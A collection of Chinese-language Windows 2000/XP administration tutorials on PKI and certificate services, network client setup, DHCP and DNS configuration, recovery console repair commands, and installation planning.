    通常缩写为 PKI 的公钥系统是由数字证书、证书颁发机构 (CA) 以及核实和验证通过公钥加密方法进行电子交易的每一方的合法性的其他注册颁发机构所构成的系统。尽管作为电子商务必要组成部分的公钥基础结构 (PKI) 已被广泛应用，但它仍然在发展之中。有关规划 PKI 和使用公钥加密的详细信息，请参考资源：公钥基础结构

一个单位选择使用 Windows 2000 配置 PKI 的原因有很多：
§　强大的安全性。通过智能卡获得强大的身份验证。也可以通过使用网际协议 (IP) 的安全机制来维护传输在公网上的数据保密性和完整性，并使用 EFS（文件加密系统）维护已存储数据的保密性。此外，管理员可以使用 Windows 2000 安全权限来确定何种证书可以颁发到哪个用户。
§　简化管理。用户的单位可以颁发证书以取代密码。必要时可以吊销证书并公布证书吊销清单 (CRL)。管理整个企业的信任关系也有极大的灵活性。也可以利用与 Active Directory 和组策略结合的证书服务。在 Windows 2000 中还提供了将证书映射为 Active Directory 中的或通过 Internet 信息服务 (IIS) 得到的用户帐户的功能。
§　新的机遇。可以在 Internet 这样的公网上安全地交换文件和数据。用户可以通过使用 S/MIME（安全的多用途 Internet 邮件扩展)实现安全的电子邮件传输，使用安全套接字层 (SSL) 或传输层安全性(TLS) 实现安全的 Web 连接。
    而且，作为电子商务的重要组成部分，用户可以使用数字签名建立相互信任。

Windows 2000 特性可以帮助用户的组织执行公钥基础结构，包括：
§　证书。证书主要是证明证书持有人的身份颁发机构所颁发的数字声明。证书将公钥与拥有相应私钥的个人、计算机或服务绑在一起。证书由各种公钥安全服务和提供身份验证的应用程序、数据完整性和通过网络的安全通讯（例如 Internet）使用。
    Windows 2000 中基于证书的进程所使用的标准证书格式是 X.50d0av3。X.50d0a 证书包括接受证书的个人或实体的有关信息、证书的有关信息以及有关证书颁发机构的可选信息。主题信息可能包括实体名称、公钥、公钥算法以及可选择的唯一主题标识。版本 3 证书的标准扩展部分则包含与密钥标识、密码用法、证书策略、候选名称和属性、证书路径约束相关的信息，以及用于吊销证书的增强部分，其中包括吊销的原因和由 CA 更新的 CRL 部分。

§　Windows 2000 Server 上的证书服务。证书服务是 Windows 2000 用来创建和管理证书颁发机构 (CA) 的组件。CA 负责建立和确定证件持有者的身份。如果证书不再有效，CA 会吊销证书并公布由证书核对者使用的证书吊销列表 (CRL)。最简单的 PKI 设计只有一个根 CA。然而实际上，部署 PKI 的大部分组织会使用多个 CA，这些 CA 被组织成称为证书层次结构的信任组。
    证书服务的个别组件是 CA Web 登记页面。这些 Web 页是在用户安装 CA 时默认安装的，并允许证书申请者使用 Web 浏览器递交证书申请。另外，也可以在未安装证书颁发机构的 Windows 2000 服务器上安装 CA Web 页面。在这种情况下，系统使用 Web 页直接将证书申请递交给 CA，而不管是什么原因，用户都不希望申请者直接访问。如果用户选择为单位创建自定义的 Web 页以访问 CA，那么在 Windows 2000 中提供的页面可作为范例。
§　智能卡支持。Windows 2000 支持通过智能卡上的证书登录，以及使用智能卡存储用于 Web 身份验证、安全的电子邮件以及与公钥加密相关的其他活动的证书。
    公钥策略。在 Windows 2000 中可以使用组策略自动给计算机指派证书、建立证书信任表和公用的信任证书颁发机构，以及为 EFS（文件加密系统）管理恢复策略。

返回


Windows 2000 网络客户端的安装和配置

《一键清理系统垃圾》

Windows 2000 网络客户端的安装和配置

本章主要内容：
1、Windows 9x 与 Windows 2000 网络的互连
2、Windows NT Workstation 与 Windows 2000 网络的互连
3、Windows 2000Professional 与 Windows 2000 网络的互连

    1、 Windows 9x 与 Windows 2000 网络的互连
    步骤1 如果在 Windows 2000 Server 中已经配置了 DHCP 服务，并且由DHCP服务器指定其它网络相关设置（如： DNS 、 WINS ），则在 Windows 9X 中安装或设置 TCP/IP 时，单击控制面板双击"网络"选择"TCP/IP"单击"属性" ，选择"IP 地址"选项卡然后选择"自动获取 IP 地址"如图 2.1

步骤2 如果未在DHCP服务器中未指定其它网络相关设置，则按以下方法指定 DNS、WINS 服务器：
    1. 进入 TCP/IP 高级属性
    2. 选择"DNS 配置" 标签，选择"启用 DNS"选项如图 2.2

        图 2.2 TCP/IP属性对话框

3.　输入主机名称、域名称，添加DNS服务器 IP 地址
4.　选择 " WINS 配置"选项卡中单击"启动 WINS 解析"，然后添加服务器的 IP 地址单击"确定"如图2.3
5.　如果使用 DHCP 服务进行自动设置则选择"使用 DHCP 进行 WINS 解析"
    步骤3 设置登陆域，在 "Microsoft 网络客户" 的属性对话框中选择"登陆到 Windows NT 域"在下方填写域的名称，然后单击确定。

      图 2.3 TCP/IP属性对话框

2、 Windows NT Workstation 与 Windows 2000 网络的互连
    步骤1 以 WindowsNT4.0 Server 为例加以说明，同样适用于 Workstation。打开"控制面板" 选择"网络"选择"协议"选项卡单击 "TCP/IP 通信协议"，然后单击"属性"选择"从 DHCP 服务器中获得 IP 地址"，如图 2.4 所示。

      图 2.4 IP 属性

步骤2如果未在 DHCP 服务器中未指定其它网络相关设置，则按以下方法指定 DNS、WINS 服务器：
    在 WindowsNT4.0 server/workstation 中， TCP/IP 通信协议单击"属性" 选择"DNS"，在 DNS 标签中如图 2.5 中输入以下各项：
主机名：输入计算机的主机名称
域：主机所隶属的域名称
DNS 服务器搜索顺序：添加 DNS 服务器的地址
域后缀搜索顺序：添加主机名称的后缀

      图 2.5 NT 的 DNS 属性

选择 "WINS 地址"，然后输入主 WINS 服务器及二级 WINS 服务器的 IP 地址，单击"确定"完成，如图 2.6 。

      图 2.6 NT 的 WINS 选项卡

3、 Windows 2000 Professional 与 Windows 2000 网络的互连
    步骤1 如果用户的计算机在安装 Windows 2000 时连接在网络中， Windows 2000 自动检测网卡并安装相应的客户端软件及协议，默认协议为 TCP/IP 协议。
    步骤2 在安装后设置网络，以管理员身份登录到计算机上右键单击"本地连接"选择属性；然后单击"配置"查看网卡工作是否正常工作
    步骤3 查看并添加客户软件，服务，协议（Microsoft Network 客户端、Microsoft Network 的文件和打印服务、TCP/IP 协议、NetBUIE 协议）
    步骤4 第三设置IP地址、DHCP、WINS、DNS
    如服务器使用 DHCP 分配 IP 地址并在DHCP中添加了 WINS、DNS、ROUTER 的环境设置
    以管理员身份登录到计算机上右键单击"本地连接"选择属性，然后点选" Internet 协议（TCP/IP）"单击"属性"选择"自动获得 IP 地址"和"自动获得 DNS 服务器地址"如图 2.7 。

      图 2.7 "常规"选项卡

单击 "Internet 协议（TCP/IP）"单击"属性"，在"高级"选项卡中选择 "WINS" ,然后添加WINS地址并选择"启用 TCP/IP 上的 NetBIOS" ，单击"确定"如果利用 DHCP 服务进行自动设置则选"使用来自 DHCP 服务器的 NetBIOS 设置，如图 2.8 。

      图 2.8 WINS 选项卡

如果需要进一步设置客户机的 DNS 属性，则单击"高级"按钮选择 DNS 标签如图 2.9，

        图 2.9 DNS属性

如果选择"搜索主 DNS 和每一个连接的 DNS 域"表示在搜索一个不标准的域名称时只能在父域中搜索，如果父域中搜索不到该域名则将此结果返回；如果选择"搜索这些 DNS 域"选项则在搜索域名称时首选在列表中的服务器上搜索，如果搜索不到结果则在其它域中进行搜索。
    "在 DNS 注册此连接的地址、在 DNS 中注册此连接的域名"这两个选项用于在 Win2000 环境中在登录时将客户机的 IP 地址及域名注册到 DNS 服务器中。
    在 DNS 服务器和客户机的设置完成后用户可以利用 IPCONFIG、PING、NSLOOKUP 三个命令测试 DNS 服务器的设置是否正确。
    步骤5 用户可以在安装的时候指定计算机所属的域，也可以在安装后指定计算机的域。

以管理员身份登录到计算机上，右击"我的电脑"单击"属性"选择"网络标识标签"然后选择"高级"；选择"域"并填写域名，在接着出现的对话框中填写域用户名和密码然后单击"确定"如图 2.10。
    注意：如计算机帐户和用户帐户分属不同的域则在填写用户名时用以下格式：域名\用户名

    图 2.10 "网络标识"对话框

返回


Windows 2000 中的DHCP-网络管理员的新利器

《一键清理系统垃圾》

Windows 2000 中的DHCP-网络管理员的新利器

    在Windows NT 4.0的网络中，大多数网络管理员都采用DHCP技术来简化自己的网络管理，然而在Windows NT 4.0中，DHCP服务器在安全性、稳定性等方面还存在一些问题，这些问题不仅给管理员的工作造成了一些麻烦，而且也限制了DHCP的使用。微软的新一代操作系统--Windows 2000在DHCP上下了很大的功夫，不仅解决了NT 4.0中的那些问题，而且还增加了许多新的特性，下面我们就一起来看看Windows 2000中的DHCP。

    Windows 2000中DHCP的新特性

    首先，DHCP与DNS相集成。在Windows 2000中，DHCP服务与DNS服务联系比在Windows NT4.0中更为密切，DHCP服务器不仅能够为其客户机注册和更新地址信息，还能实现一些附加的功能：如返回客户机的全称域名（FQDN）、在一台动态DNS服务器上修改个人主机资源纪录等，DHCP服务器能区别Professional客户端与其它客户端，并且象代理一样为其它客户端（如Win 95、Windows NT 4.0）到动态DNS服务器上注册地址信息。

    在Windows 2000中增强了DHCP监视与静态察看工具-DHCP管理器的功能。这一新工具可以在用户定义的标准下为IP地址分配工作提供通知，假设用户定义IP地址使用数目标准为90%，当超过90%的IP地址被分配给用户时，警示图标将会变为黄色；当IP地址被耗尽时，该图标将会变为红色。DHCP管理器还能以图形方式查看静态的数据，比如说服务器的作用域个数、地址数以及已用的地址数对全部可用的地址数之比。还可以查看地址请求数、成功的IP租用认可、不成功的IP租用认可等等。这样将有助于管理员监视系统的状态，及时发现网络中已经发生的问题并预测即将发生的问题。

    在Windows 2000的DHCP中还添加了对供应商类及用户类的支持。在Windows NT 4.0网络中，DHCP服务器为所有的客户机提供相同的配置。在Windows 2000的DHCP中提供了两种可选的类，可以使用类来为用户提供唯一的配置信息。这两种类型为用户类（User class）和供应商类（Vendor class）。通过定义供应商类来管理分配给不同供应商的DHCP客户机的数据；通过定义用户类可以为那些未基于供应商类的客户机分配配置数据。某些用户需要特殊的配置，比如说你可以为移动计算机用户分配较短租用期的IP地址，为台式计算机用户提供较长租用期的IP地址。

    Windows 2000中的DHCP提供了对多重广播地址（Multicast Address）的分配，多重广播地址允许在网络中选择计算机参与合作应用程序的会话。通常网络会议及视听应用程序均采用多重广播技术，它们需要用户配置多重广播地址。不象IP广播地址那样会被全网络的所有计算机接收到，一个多重广播地址是一个计算机组，只有该组的成员计算机才能收到发给该多重广播地址的数据。可以在DHCP管理器中通过添加插件实现多重广播地址的分配。

    在Windows NT 4.0网络中存在这样一个安全上的问题：任何用户都可以创建一台DHCP服务器，该服务器也可以为用户分配IP地址，这样就可能造成地址冲突，在Windows 2000中这个问题得到了有效的解决：任何DHCP服务器只有在目录服务中被授权之后才能为客户分配IP地址，否则即使该服务器收到租用请求，也不能为客户机分配IP地址。其具体的过程是这样的：在目录中存放有获得许可的服务器列表，当DHCP服务刚刚启动时，DHCP服务器会向网络发DHCPINFORM广播，其它DHCP服务器收到该信息后将返回DHCPACK信息，并提供自己所属的目录域，DHCP将查看自己是否属于某个域，并验证是否在该域的认证服务器列表中，如果该服务器发现自己不能连接到目录或发现自己不在认证列表中，它将认为自己没有被授权；如果发现自己在认证列表中，它将为用户提供服务；如果发现自己不属于某个域，则在检测到其它域成员DHCP服务器的响应时，将认为自己没有被授权；如果这台DHCP服务器检测到其它工作组的一个DHCP服务器，它将忽略这个信息，这意味着当前环境中没有目录服务。当一个工作组中的DHCP服务器发现没有域的成员服务器或工作组的服务器在网上，则认为自己可以运行，它仍将每隔5分钟发送一次DHCPINFORM广播，一旦收到某域中被许可的DHCP服务器的启动信息，该服务器将认为自己未获得许可并将停止提供服务。

    在Windows 2000中使用了Windows集群技术。Windows集群能将两个服务器当一个单系统进行管理，同样也能用于DHCP服务器以提高系统的稳定性。管理员可以通过集群技术来检查集群资源的状态并将一部分超负载工作的服务移到集群中的另一台服务器上，这样可以在保证重要数据或应用程序在线的情况下保持系统的负载均衡。集群的DHCP服务器可以在一个节点崩溃后另一个节点继续工作，而客户端不需要任何修改，只是经历短暂的延迟而已，同时也不会浪费IP地址，因为在没有使用集群技术时，网络管理员必须将作用域分为若干部分放于几个DHCP服务器上，以保证当一台DHCP服务器失败时，至少有一部分IP地址仍可以被用户租用。

    在一个没有可以用来分配IP地址的DHCP服务器的Windows 2000网络中，DHCP客户端在启动时具有自动配置一个IP地址和子网掩码的能力。DHCP客户服务通过两步来完成客户机的IP地址及其它配置信息的配置：在客户机被安装后，它将尝试连到DHCP服务器并从服务器得到配置信息，如果在尝试连接到一个DHCP服务器时失败，则自动选用一个IP地址配置自己；在从服务器获得地址租用后，DHCP客户机将尝试到DHCP服务器刷新没有到期的IP租用，如果连接不到任何DHCP服务器，它将尝试PING默认网关，如果成功，该客户机将继续使用该租用地址。如果PING默认网关失败，该客户机将假定自己被移到另一个当前没有DHCP服务器的网络中，它将自动进行配置，并且每过5分钟尝试寻找DHCP服务器一次。

    在Windows2000中设置DHCP

    要将一台Windows 2000服务器设置为DHCP服务器首先要在该服务器上安装DHCP服务：用Administrator帐号登录，在控制面板中双击"添加/删除程序"，选择"添加/删除Windows组件"，启动Windows组件向导，选中"网络服务"，单击"详细信息"，选中"动态主机分配协议"，单击"确定"，即可在该服务器上安装DHCP服务。

    要想使刚安装的DHCP服务器能为客户机分配IP地址，必须首先在域中为该服务器授权(Authorize)。使用Administrator帐号登录计算机，在"管理工具"菜单中打开DHCP控制台；在控制树中，右键单击想要授权的服务器，在弹出菜单中，单击"授权"，即可完成对该服务器的授权。

图-1

    要想使DHCP服务器能为客户机分配IP地址，还必须在该服务器上创建并配置作用域（Scope）或者超级作用域(Superscope)、多重广播地址作用域(Multicast Scope)，使用Administrator帐号登录计算机，在"管理工具"菜单中打开DHCP控制台（见图-1），在控制树中，右键单击要用来分配地址的服务器，选中"新建"ü"作用域"，在创建作用域向导的指引下输入作用域的起始地址、输入子网掩码、排除的地址或地址范围、DHCP租约期限等信息后即可完成作用域的创建。超级作用域、多址广播域的创建步骤与创建作用域时相类似。

    在进行了以上配置后，你的网络就可以按照你的意愿工作了。由于安全性、稳定性的提高，网络的管理也轻松了，还是赶快升级你的系统吧！

返回


Windows 2000Server中DNS的实现

《一键清理系统垃圾》

Windows 2000Server中DNS的实现

域名系统 (DNS)可以将计算机名（或域名）解析为IP地址。这些名称用于搜索和访问本地网络或Internet上的资源。域名系统是由各级域名组成的树状结构的分布式数据库，采用客户机/服务器机制，DNS服务器中包含域名和IP地址的对照信息，供客户计算机查询。

■DNS提供的新功能

* 支持活动目录（AD）

与NT 4.0不同，Windows 2000 Server中活动目录的域采用与Internet类似的DNS命名，DNS集成到活动目录的设计和实现中。如果在服务器上安装了活动目录，Windows 2000 Server会自动为活动目录安装和配置DNS服务。

* 支持动态更新

Windows 2000 Server中的DNS服务允许运行Windows 2000的客户机，动态地在DNS服务器中注册它们的域名和IP地址，简化了管理。

* 支持DNS服务器之间的递增区域传送

在区域中的多台DNS服务器之间需要通过区域传送来复制和同步域名空间信息。早期的DNS使用完全区域传送，即需要完全复制全部域名信息，Windows 2000 Server中的DNS支持递增区域传送，DNS服务器之间只复制区域中改变的部分，而不是所有信息。

■DNS的规划

在安装DNS服务之前需要对DNS进行规划，决定DNS中要实现的域名空间、DNS是否与活动目录集成、是否需要辅助DNS服务器等。

我们的例子中，要在内部网实现的域名为ha.epnet,不与活动目录集成，网络上有两台DNS服务器，一台是主服务器Server2，一台是辅助服务器Server3，内部网分为两个网段：10.41.100.0和10.41.101.0，子网掩码为255.255.255.0。

下面安装和配置主服务器Server2。

■安装DNS服务

在安装Windows 2000 Server的DNS服务器之前，要正确地配置Windows 2000 Server服务器的TCP/IP协议，要求有静态的IP地址配置和正确的域后缀。要求有正确的域后缀是因为它将影响DNS中起始授权机构 (SOA)和名字服务器（NS）的创建。本例中服务器的域后缀为将要实现的域名ha.epnet。

1. 在Server2上单击“开始”→“设置”→“控制面板”选单，打开控制面板。

2. 双击“添加/删除程序”，然后单击“添加/删除 Windows 组件”，出现“ Windows 组件向导”窗口。 单击选中“网络服务”，然后单击“详细信息”，弹出“网络服务窗口”。

3. 在“网络服务的子组件”中，选中“域名服务系统 (DNS)”，单击“确定”，然后单击“下一步”，根据提示进行安装。

4. 安装完成后重新启动系统。

■配置DNS的区域

DNS服务器安装完成后，需要在DNS中创建区域（zone），实现域名。

区域是DNS域名空间的组成部分，DNS允许域名空间分成几个区域，每个区域存储着一个或多个 DNS 域的名称信息，作为单独的文件存放在磁盘上。区域和域是不同的概念，对于一个 DNS 域名，区域是对应的一个存储数据库。当用于创建该区域的域需要添加子域时，这个子域可以被添加到该区域的下面，成为该区域的一部分，也可以为子域创建另外的区域，并把子域委派到这个新建的区域中。

Windows 2000 Server DNS中的区域有三种类型：与活动目录集成的区域、标准主要区域、标准辅助区域。与活动目录集成的区域必须安装在域控制器上，新区域将域名信息存储到活动目录中，区域信息可以在多台DNS服务器上更新。标准主要区域是Windows NT 4.0中DNS使用的区域，它把域名信息保存到一个标准的文本文件。对于标准主要区域，只有一台DNS服务器能维护和处理这个区域的更新,它被称为主服务器。如果需要使用多台主服务器，则必须使用与活动目录集成的区域。标准辅助区域是现有区域的一个副本，为主服务器提供平衡处理和容错能力，它在辅助服务器上创建，辅助服务器只能从主服务器复制信息。

按照DNS搜索区域的类型，DNS的区域可分为正向搜索区域和反向搜索区域。正向搜索是DNS服务器要实现的主要功能，它根据计算机的DNS名称解析出相应的IP地址，而反向搜索则是根据计算机的IP地址解析出它的DNS名称。

下面在主服务器Server2上创建正向搜索的标准主要区域，实现域名，区域的名称命名为ha.epnet。

一、创建正向搜索的标准主要区域

Windows 2000 Server中DNS的管理工具是DNS控制台。

1. 在Server2上单击“开始”→“程序”→“管理工具”→“DNS”，打开DNS控制台。

2.在控制台树中展开相应的 DNS 服务器。 如果DNS 服务器没有列出来，在控制台树中单击选中“DNS”，在控制台选单中单击“操作”→“连接到计算机”，选择要连接的计算机进行连接。

3.在控制台树中，单击选中“正向搜索区域”。单击选单“操作”→“新建区域”，弹出“新建区域向导”窗口，单击“下一步”。

4.选择区域类型为“标准主要区域”。如果不是在活动目录的域控制器上创建DNS区域，则区域类型中的“与活动目录集成的区域”选项按钮不可用。单击“下一步”。

5.输入要创建的区域名称ha.epnet。单击“下一步”。

6.选择创建新的区域文件，文件名为ha.epnet.dns。单击“下一步”，单击“完成”。

区域ha.epnet出现在控制台树中的“正向搜索区域”下。

二、创建反向搜索的标准主要区域

在大部分的 DNS 搜索中，客户机一般执行正向搜索。 DNS 同时提供反向搜索，允许客户机根据一台计算机的IP 地址搜索它的DNS名称。反向搜索的域名信息保存在反向搜索区域中。为进行反向搜索，需要在DNS服务器中创建反向搜索区域。在 DNS 标准中定义了特殊域in-addr.arpa，反向搜索区域中的域是域in-addr.arpa的子域。

在DNS中创建反向搜索区域时，反向搜索区域的名称是由待反向搜索IP 地址的十进制编号的相反顺序加上in-addr.arpa形成。例如本例中要提供对网段10.41.100.0中的主机的反向搜索，必须创建一个100.41.10.in-addr.arpa的反向搜索区域。对于不同的网段，要根据网络地址分别创建不同的反向搜索区域。

本例中存在两个网段10.41.100.0和10.41.101.0，需要为这两个网段分别创建反向搜索区域。

1.在Server2上打开DNS控制台，在DNS控制台树中单击选中“反向搜索区域”。单击选单“操作”→“新建区域”，弹出“新建区域向导”窗口，单击“下一步”。

2. 选择区域类型为“标准主要区域”。单击“下一步”。

3.对于网段10.41.100.0输入网络号10.41.100。如图1所示。

图1

单击“下一步”。

4. 选择创建新的区域文件，文件名为100.41.10.in-addr.arpa.dns。单击“下一步”→“完成”。

对于网段10.41.101.0重复上述操作，在第三步中，输入网络号10.41.101，创建的区域文件为101.41.10.in-addr.arpa.dns。

控制台树中的“反向搜索区域”下出现创建的对应两个网段的两个反向搜索区域，名字显示为“10.41.100.x Subnet”和“10.41.101.x Subnet”。

返回


Windows 2000/XP操作系统故障恢复控制台

《一键清理系统垃圾》

Windows 2000/XP操作系统故障恢复控制台

    很多的Windows崩溃后一般都是选择重新安装，不过，很多时候，利用好Windows 2000/XP的故障恢复控制台却可以帮助我们恢复或修复很多东西。
小知识　如何进入恢复控制台

    插入一张Windows 2000/XP的安装光盘，设置电脑优先从光驱启动。启动后，系统会自动进入Windows安装界面选项（如图1），按下“R”键选择第二项“要使用‘故障控制台’修复Windows XP安装，请按R。”然后输入系统密码，即可自动登录到故障恢复控制台。

图1

    1.拷贝/备份文件

    当机器崩溃时，我们仍可以在恢复控制台下拷贝文件，使用copy命令即可。其格式为：copy source [destination]，参数source指定要被复制的文件的位置和名称。destination指定要复制到其中的文件或文件集的位置和名称。
如，我们可以输入copy c:\data\back.rar　d:\命令，这样即可把c:\data\back.rar文件拷贝到d:\下了。

    2.修复Boot区

    当机器无法启动时，可以在故障恢复控制台下输入fixboot命令向系统分区写入新的分区引导扇区，使它可以引导系统。其中命令格式为fixboot [drive]，drive为要写入引导扇区的驱动器。如果不带任何参数，fixboot 命令将向用户登录的系统分区写入新的分区引导扇区。

    3.修复主引导记录

    当你的机器遭遇了主引导记录病毒或者主引导记录损坏时，可以在故障恢复控制台下输入Fixmbr命令，它将修复启动磁盘的主启动记录。其命令格式为：fixmbr [device_name]，其中参数device_name是要写入新的主引导记录的设备（驱动器）。如输入fixmbr \Device\HardDisk0则会修复C盘上的主引导记录。

    小提示

    ★如果不指定device_name，新的主引导记录将被写入引导设备，即装载主系统的驱动器。

    ★如果系统检测到无效或非标准分区表标记，将提示用户是否继续执行该命令。除非您访问驱动器有问题，否则不要继续进行。向系统分区写入新的主引导记录可能破坏分区表并导致分区无法访问。

    4.格式化坏区

    Format将指定的驱动器格式化为指定的文件系统，此命令可以用于恢复并格式化一些坏区。其命令格式为：format [drive:][/fs:file-system]，其中参数drive是指定要格式化的驱动器。/q表示对驱动器进行快速格式化。/fs:file-system

    指定要使用的文件系统：FAT、FAT32 或NTFS。如果未指定文件系统，将使用现有的文件系统格式。

    如输入 format d: /fs:ntfs将会把D区格式化为NTFS分区。

    5.解压压缩包中文件

    Expand命令可以从.cab 文件或压缩文件中提取驱动程序文件。其命令格式为：expand source [/F:filespec}] [destination] [/d] [/y]，其中参数有如下意义：source

    指定要展开的文件。如果源文件只包含一个文件，请使用该选项。source 可由驱动器号和冒号、目录名、文件名或组合所组成。不能使用通配符。
/f:size

    如果源文件包含多个文件，指定要提取的文件的名称。可以对要提取的文件使用通配符。

    destination

    指定提取文件或每个单独文件的目标目录和（或）文件名。

    /d

    列出CAB 文件中包含的文件而不展开或提取。

    /y

    在展开或提取文件时不出现覆盖提示。

    如输入expand d:\i386\driver.cab \f:msgame.sys c:\winnt\system32\drivers将会从安装CD上的驱动程序CAB 文件中提取Msgame.sys 文件并将其复制到
C:\Winnt\System32\Drivers文件夹下。该命令将发现某一驱动程序无法使用时，替换相应文件时特别有用。

     又如，输入expand d:\i386\access.cp_ c:\winnt\system32\access.cpl将把Windows安装CD上i386文件夹下的access.cp_解压到c:\winnt\system32\access.cpl下，使控制面板中相应的项目可用。

    再如输入expand /d d:\i386\driver.cab将会列出安装CD 上的驱动程序CAB 文件中的所有文件

    小提示

    驱动程序CAB 文件包含成千上万的文件，其中包括由Windows 提供的大部分驱动程序。将所有文件从CAB 文件展开到硬盘上需要花较长的时间和大量的磁盘空间。建议仅从该文件中提取需要的文件。

    6.收回丢失的分区

    很多人对于硬盘分区程序FDisk不太熟悉，因此，很担心会弄丢数据。同时，如果你的一些分区丢失了，完全可以通过diskpart命令找回来！在故障恢复控制台状态下输入diskpart命令，即可出现一个全中文的分区界面（如图2）。利用它可以看到并删除再重新建立丢失的分区，非常有效。

图2

    小提示

    ★当然，如果你的分区中有内容，还是尽力地从中恢复数据再删除后重建。

    ★此命令也可以用来创建分区，在中文状态下就可以对新硬件进行分区了，非常方便。

    ★当你有一些微软操作系统无法识别的分区时，可以利用该命令先删除，再重建，然后即可在Windows下识别并使用。

    7.禁止某些服务

    Disable命令可以禁止掉Windows NT/2000/XP中的系统服务或设备驱动程序。其命令格式为：disable {service_name] | [device_driver_name}，其中参数service_name是要禁用的系统服务名称，device_driver_name是要禁用的设备驱动程序名称。当你确认某一不正确的服务影响了机器的启动，可以输入相应命令禁止掉它。

    如输入disable eventlog将禁用Eventlog 服务。

    小提示

    ★disable 命令将指定的服务或驱动程序的启动类型设为SERVICE_DISABLED。

    ★使用disable 命令禁用系统服务或设备驱动程序时，该系统服务或设备驱动程序上次启动类型的名称将显示在屏幕上。应该记下该名称，以便在需要时使用enable 命令将启动类型恢复为上次的设置。


Windows 2000安装10大要点

《一键清理系统垃圾》

Windows 2000安装10大要点

■你的计算机是否适合安装Windows 2000

在开始安装Windows 2000之前，为保证安装的顺利和成功，必须保证硬件符合下列最低的需求：

133MHz Pentium或更高的微处理器（或相当的其他微处理器）。

推荐最小64MB内存（最小支持32MB，最大4GB）。

2GB硬盘，850MB的可用空间。

除了要满足最低硬件配置需求外，还要考虑你的硬件和软件是否与Windows 2000兼容，如果你的计算机中有一些老的如ISA接口的设备等最好进行更新。还要了解硬件的驱动程序是否适用于Windows 2000。

■只安装Windows 2000还是安装双重引导系统

开始安装程序之前，还应该决定是只安装Windows 2000还是安装双重引导系统，以便在计算机上同时使用 Windows 2000 Professional和其他操作系统，如MS-DOS或Windows 98等。

因为目前除了Office 2000和IE 5等少数应用程序能与 Windows 2000完全兼容外，大多数软件在Windows 2000环境下不能很正常地使用，所以建议安装双重引导系统。这样既可以让你的计算机充分发挥Windows 2000的效能，又可以运行一些16位的应用程序。

Windows 2000支持与下列操作系统进行双重引导：

NT 3.51、NT 4.0

Windows 95、Windows 98

Windows 3.1、Windows for Workgroups 3.11

MS-DOS、OS/2

■选择文件系统是用NTFS还是FAT、FAT32

如果只安装 Windows 2000，建议选择NTFS文件系统，NTFS是Windows 2000推荐使用的文件系统，NTFS具有 FAT的所有基本功能，并提供了下列优于FAT和FAT 32文件系统的特点：

更好的文件安全性。

更大的磁盘压缩。

支持大磁盘，最大可达2TB（NTFS的最大驱动器容量远远大于FAT的最大驱动器容量，并且随着驱动器容量的增加，NTFS的性能并不下降，这与FAT有很大不同） 。

可以在安装过程中，将现有的分区转换为NTFS。也可以在安装后的任何时候，通过在命令提示符下使用Convert.exe程序，将文件系统从FAT转换为NTFS。

但是NTFS文件系统存在一个明显的不足，就是如果使用NTFS格式化分区，那么只有Windows 2000可以访问在该分区上创建的文件（ 除了Windows NT 4.0 Service Pack 4(SP4) 及其后续版本外），其他操作系统不能使用Windows 2000 NTFS分区。

因此如果计划安装双重引导系统，就不能使用NTFS文件系统，应使用 FAT32或FAT文件系统。对于Windows 2000同Windows 95或MS-DOS之间的双重配置，主分区必须使用FAT格式化；而对于Windows 2000同Windows 95 OSR2或Windows 98的双重配置，主分区必须使用FAT或FAT32格式，而不是使用NTFS。

如果安装分区小于2GB，那么应使用FAT格式分区。

对于容量为2GB或更大的分区，则使用FAT32文件系统。如果在运行Windows 2000安装程序过程中用FAT格式分区，且分区大于2GB，那么安装程序会自动使用FAT32格式分区。

大于32GB的分区推荐使用NTFS而不是FAT32文件系统格式。

■安装前创建安装启动盘

当无法从硬盘上启动安装程序时，可用安装启动盘来启动安装程序。如果没有安装启动盘，可以自行创建。

注意：安装启动盘与紧急修复磁盘包含的信息并不相同。

创建安装启动盘：

将一个已格式化过的磁盘插入软驱中，并在CD-ROM 驱动器中放入Windows 2000 Professional光盘。

需要四张1.44MB空白并已格式化的3.5英寸磁盘。将它们标记为“安装磁盘 1”、“安装磁盘 2”等等。

单击“开始”，然后单击“运行”。

在提示符下，键入下列命令：

d:\bootdisk\Makeboot.exe a: （d为 CD-ROM 驱动器的盘符，a 为软驱的盘符。）

遵循出现的提示进行操作。

■选择全新安装还是更新安装

如果想保留现有的文件和参数设置，而且使用的是支持升级的以前版本的Windows，那么应该选择更新。在更新过程中，安装替换了现有的Windows文件，但保留了已有的设置和应用程序。有些应用程序可能与Windows 2000 不兼容，因此在更新后，它们可能无法在Windows 2000中正常运行。

可以从下列操作系统升级或更新到Windows 2000 Professional：

Windows 95（所有版本）和Windows 98（所有版本）

Windows NT 3.51 Workstation、Windows NT 4.0 Workstation（包括 Service Pack）

如果符合下面的任何一种情况，那么应该选择全新安装：当前的操作系统不支持升级到Windows 2000；已使用某个操作系统，但不想保留现有的文件和参数设置；有两个分区，并想使用Windows 2000和当前的操作系统创建双重引导配置。

■若要安装双重引导系统，必须为每个操作系统使用单独的分区

如果选择Windows 2000的双重引导配置，那么每个操作系统都应被安装在单独的驱动器或磁盘分区上。将Windows 2000安装到与其他操作系统相同的分区上，会导致安装程序将其他操作系统安装的文件覆盖。

安装Windows 2000的磁盘分区的大小时，建议为1GB以上的磁盘空间。尽管安装Windows 2000最小只需要500 MB的可用磁盘空间，但使用较大的安装分区可为以后添加更新软件、操作系统工具或其他文件提供更大的灵活性。

■安装双重引导系统的顺序

要在MS-DOS或Windows 95同Windows 2000间安装双重引导系统，应最后安装Windows 2000。否则，启动Windows 2000所需的重要文件都会被覆盖。

对于Windows 98和Windows 2000之间的双重引导，则可以不在意安装它们的顺序。

■硬件驱动程序的安装

如果使用双重引导，在安装好其他操作系统后，应先安装硬件的驱动程序再安装Windows 2000。如果安装好Windows 2000后再安装其他操作系统中硬件的驱动程序，可能会影响到Windows 2000中的硬件配置。

Windows 2000安装完成后，系统会自动识别硬件并为其安装驱动程序。如果不能确定手中的驱动程序是否适用于Windows 2000，建议你不要更新驱动程序，否则轻则硬件工作不正常，重则影响Windows 2000系统的运行。

如果更新驱动程序后出现了问题，你可以运用Windows 2000中的“最近一次的正确配置”功能来解决问题。

注意：选择“使用‘最近一次的正确配置’启动 Windows 2000”是解决如新添加的驱动程序与硬件不相符问题的一种方法，它没有解决损坏或丢失驱动程序或文件所导致的问题。

当选择“最近一次的正确配置”时，Windows 2000 只恢复注册表项 HKLM\System\CurrentControlSet 下的信息，任何在其他注册表项中所做的更改均保持不变。

■应用程序的安装

